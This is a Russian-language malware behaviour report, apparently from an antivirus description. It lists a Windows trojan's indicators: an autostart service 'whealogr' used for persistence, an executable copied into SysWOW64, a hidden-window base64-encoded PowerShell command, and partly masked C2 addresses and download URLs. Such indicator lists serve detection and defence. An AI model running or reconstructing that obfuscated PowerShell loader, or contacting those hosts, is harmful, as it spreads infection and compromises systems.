Техническая информация
- [<HKLM>\System\CurrentControlSet\Services\whealogr] 'Start' = '00000002'
- [<HKLM>\System\CurrentControlSet\Services\whealogr] 'ImagePath' = '"%WINDIR%\SysWOW64\secproc_isv\whealogr.exe"'
- 'whealogr' "%WINDIR%\SysWOW64\secproc_isv\whealogr.exe"
- 'whealogr' %WINDIR%\SysWOW64\secproc_isv\whealogr.exe
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABXAHQAdQByADAAOQAxAD0AKAAoACcAUQAnACsAJwBkAHgAJwApACsAKAAnADEAOQBtACcAKwAnADkAJwApACkAOwAuACgAJwBuACcAKwAnAGUAdwAtAGkAJwArACcAdABlAG0AJwApACAAJABFAG4AVgA6AHQARQBNAHAAXAB3AE8AUgBEAFwAMgAwAD...
- %TEMP%\word\2019\y85mi4vtd.exe
- %WINDIR%\syswow64\secproc_isv\whealogr.exe
- %TEMP%\word\2019\y85mi4vtd.exe в %WINDIR%\syswow64\secproc_isv\whealogr.exe
- '67.##.210.95':80
- '16#.#41.242.173':8080
- http://qs##ide.com/img/0/
- http://16#.###.242.173:8080/OhprmgA8HXAp6def3mC/eYhvxLe1XJhyYR3FCK/ via 16#.#41.242.173
- DNS ASK qs##ide.com
- '%TEMP%\word\2019\y85mi4vtd.exe'
- '%WINDIR%\syswow64\secproc_isv\whealogr.exe'
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABXAHQAdQByADAAOQAxAD0AKAAoACcAUQAnACsAJwBkAHgAJwApACsAKAAnADEAOQBtACcAKwAnADkAJwApACkAOwAuACgAJwBuACcAKwAnAGUAdwAtAGkAJwArACcAdABlAG0AJwApACAAJABFAG4AVgA6AHQARQBNAHAAXAB3AE8AUgBEAFwAMgAwAD...' (со скрытым окном)